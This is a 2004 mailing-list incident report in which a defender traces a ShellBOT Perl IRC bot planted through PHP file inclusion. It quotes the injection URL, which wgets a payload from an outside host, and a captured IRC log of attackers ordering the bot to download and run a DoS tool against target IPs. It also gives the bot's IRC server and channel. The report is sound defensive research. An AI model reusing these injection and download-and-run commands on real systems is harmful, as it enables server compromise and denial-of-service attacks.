Security Incidents mailing list archives

Systems compromised with ShellBOT perl script - part 2

From: Kirby Angell <kangell () alertra com>
Date: Fri, 03 Sep 2004 18:37:52 -0500

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

(note:  This is a follow up to "Systems compromised with ShellBOT perl
script" posted on 20040901)

Introduction
- ------------

Two days ago we detected a strange Referer entry in our web logs.  This
morning we got almost the same Referer again:

http://www.DOMAIN.com/index.php?id=http://members.lycos.co.uk/gookboy/hkz.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/gookboy/.egg2

Attacking IP is still 63.227.76.25.  Attack involves servers, probably
PHP, that do not properly sanitize variables and can be tricked into
executing shell commands.  The attack downloads and executes a Perl
script (.egg2).  The Perl script sets its process name to "[httpd]" to
help it blend into the Apache threads.  It connects to an IRC channel:

Server: irc.mzima.net:6667
Channel: #brdata (note: new channel from last time)
Nickname: goober+random int

The script listens for private messages that can instruct it to do
simple portscans, DOS attacks, and execute shell commands with whatever
permissions the web server has.

This time I was more prepared and have gathered more data on the script
and what the bad guys are using it for.  I have packaged the data into a
.tar.gz file if anyone wants a copy of the whole thing including scripts.

Setup
- ------------

I modified the .egg2 script to neuter its portscan and DOS functions.
The functions are still there, but they don't actually make any
connections to remote servers.  A "sleep" command attempts to make it
look like something happened though.  I purposfully left the shell
command functional so I could see what commands they would run and not
have them get too suspicious.

The script was put into a VMWare session with a RH9 install.  iptables
was configured to allow the outgoing 6667:tcp and to disallow just about
everything else inbound and outbound.  tcpdump was setup to capture all
the traffic on the vmnet ethernet adapter outside of the VMWare session.

Results
- -------------
For several hours my rogue bot was undetected and captured at least one
attempt to enlist it along with all the rest (not as many as last time;
but several I notified 2 days ago) in an attack on a computer.  Here is
a summary of the private messages my bot received and responses (entries
prefaced with -> are commands coming into the bot and those with <- are
responses leaving the bot):

- -> :^sly!~ssly () cedar invision net PRIVMSG #brdata :!atrix killall -9 doze4
<- PRIVMSG #brdata :doze4: no process killed
- -> :^sly!~ssly () cedar invision net PRIVMSG #brdata :!atrix cd /tmp
- -> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix rm doze4
<- PRIVMSG #brdata :rm: cannot lstat `doze4': No such file or directory
- -> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix wget
http://members.lycos.co.uk/gookboy/doze4
<- PRIVMSG #brdata :--13:52:35--  http://members.lycos.co.uk/gookboy/doze4
<- PRIVMSG #brdata :           => `doze4'
<- PRIVMSG #brdata :Resolving members.lycos.co.uk... done.
<- PRIVMSG #brdata :Connecting to
members.lycos.co.uk[212.78.204.20]:80... failed: Connection refused.
- -> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix chmod +x doze4
<- PRIVMSG #brdata :chmod: failed to get attributes of `doze4': No such
file or directory
- -> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix ./doze4
81.29.36.147 53 www.ibm.com
- -> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix killall -9 doze4
- -> :sly36!~ssly () ns30111 ovh net PRIVMSG #brdata :!atrix ./doze4
65.248.51.13 53 www.ibm.com
<- PRIVMSG #brdata :sh: line 1: ./doze4: No such file or directory

So command sequence is:  kill our program, delete our program, get new
version of our program, instruct our program to attack.

In hindsight it was a mistake to not allow out going connections to at
least their Lycos server.  It drew attention to me and a few hours
later, before any other attacks were tried, I was booted and the channel
locked again.

Unfortunately it means that the IP address I used is now probably dead
for recon on this attacker.  I think they are unaware how I keep finding
the channel they are using though. If I get another shot, I'll see if I
can bounce the connection through another machine using a SSH tunnel.
If someone wants to volunteer a computer for this purpose it would be
most appreciated.

doze4
- ------------
I downloaded the "doze4" program and found it to be an elf binary.
Google didn't turn up the source code, but I have disassmbled it.  I'm
not one with Linux assembly language but its not terribly long and seems
to be a pretty basic DOS app.  Not terribly sure why they didn't just
use the one built into the script, but there is probably a good reason.
~ doze4 identifies itself as:

* * doze4 - written by phyton
* * doze4 rOckz! evite hosts.. use ips!
Usage: %s <ip> <porta> <spoof>
<ip>     : endereço que deseja f***r. (address that it desires to f***r)
<porta>  : porta aperta  (coloque 0, que é rOckz) (door presses (places
0, that he is rOckz))
<spoof>  : um ip para ser spoofado (sua mascara). (a to be spoofado IP
(its masks))

doze4 as well as .egg2 was written by someone who speeks Portugese.

Summary
- -------------
The same IP was used to initiate the attack both times.  I notified the
owner of that IP yesterday, but never received a response.  Tonight I
will be going through the list of compromised machines and notifying as
many as possible of the problem.

The files:

doze4           elf binary of DOS tool
doze4.asm       disassembled version of doze4
wget-doze4.cap  tcpdump capture of IRC session
egg2-live       dangerous version of IRC bot
egg2-neutered   egg2 with portscan and DOS disabled
                (but SHELL access is still live)
hkz.txt         PHP injection script
irclog.txt      text output of IRC connection
readme.txt      this file

are available in a .tar.gz file for anyone who requests it.  Tuesday
night my test server was attacked with a SYN flood; I expect worse this
time so I've locked it down so it will just log everything.  We don't
put this kind of thing on our production web servers, so  just shoot me
an email at kangell () alertra com if you want the archive.

- --
Thank you,

Kirby Angell
Get notified anytime your website goes down!
http://www.alertra.com
key: 9004F4C0
fingerprint: DD7E E88D 7F50 2A1E 229D  836A DB5B A751 9004 F4C0
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFBOQBQ21unUZAE9MARApnkAKCUicL19u64sXZUw4CHkybDmEJ1HQCeKKRj
l/dzGuRlVQ7TneVqdErV+7c=
=WY/A
-----END PGP SIGNATURE-----

Current thread:

Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 08)
- Re: Systems compromised with ShellBOT perl script - part 2 Shashank Rai (Sep 09)
  - Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 10)
  - Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 14)
- Re: Systems compromised with ShellBOT perl script - part 2 Andreia Gaita (Sep 10)
  - Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 08)
    - Re: Systems compromised with ShellBOT perl script - part 2 Andreia Gaita (Sep 09)
    - Re: Systems compromised with ShellBOT perl script - part 2 Kirby Angell (Sep 14)
- Re: Systems compromised with ShellBOT perl script - part 2 ASI (Sep 10)
- Re: Systems compromised with ShellBOT perl script - part 2 nathan c. dickerson (Sep 19)